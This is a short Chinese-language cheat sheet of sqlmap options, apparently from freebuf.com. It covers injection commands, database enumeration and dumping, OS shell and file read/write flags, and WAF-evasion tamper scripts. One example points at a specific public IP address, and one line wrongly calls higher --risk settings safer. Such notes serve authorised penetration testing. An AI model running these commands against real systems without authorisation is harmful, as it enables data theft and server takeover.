命令太多了,用到的时候再查,写个txt,在工作中不断积累,加深对工具的了解与使用。
=======================================
–random-agent 参数来随机的从./txt/user-agents.txt中获取。默认sqlmap头
–level 3 >=2的时候也会测试HTTP Cookie头的值,>=3的时候会测试User-Agent和HTTP Referer头的值。最高为5,主机头注入
–risk 3 执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全
–batch”命令来自动答复和判断。
–delay 3 避免waf拦截
–proxy-file (指定文件目录)设置多条代理在文件中
–eval每次请求前执行指定的python代码
===========================================
注入方式:
sqlmap -u “http://www.xx.com?id=x”-p xxx
sqlmap -r okay.txt -p username (或者在txt里加上*,或者改为 *)
sqlmap -u http://xxxxxx –data=”uname=111&passwd=aaa&submit=Submit” –param-del=”&”
sqlmap -u “http://117.167.136.245:10181/shownews.asp” –cookie “id=170” –data (cookie中参数太多使用-p指定,date需要加上)
=============================================
常用参数
–current-db 【获取当前的数据库名
–current-user 【检测当前用户
–dbs 【检测站点包含哪些数据库
–tables -D “db_name” 【获取指定数据库中的表名 -D后接指定的数据库名称
–columns -T “table_name” -D “db_name” 【获取数据库表中的字段
–dump -C “columns_name1,2” -T “table_name” -D “db_name” 【获取字段的数据内容
–beep 发现sql注入时,发出蜂鸣声。
–is-dba 【判断站点的当前用户是否为数据库管理员
使用–dbms参数用于指定数据库名称
===========================================
–os-cmd,–os-shell 执行任意操作系统命令,执行shell条件:1.网站必须是root权限2.攻击者需要知道网站的绝对路径
–file-read 从数据库服务器中读取文件
–file-write –file-dest 上传文件到数据库服务器
============================================
常用脚本:–tamper “脚本的名称”
base64encode.py 用base64编码替换
space2mssqlhash.py 替换空格
space2comment.py 用/**/代替空格
multiplespaces.py 围绕SQL关键字添加多个空格
charencode.py url编码
randomcomments.py 用/**/分割sql关键字
versionedmorekeywords.py 注释绕过
halfversionedmorekeywords.py 关键字前加注释
来源:freebuf.com 2021-05-14 10:35:54 by: darkin
请登录后发表评论
注册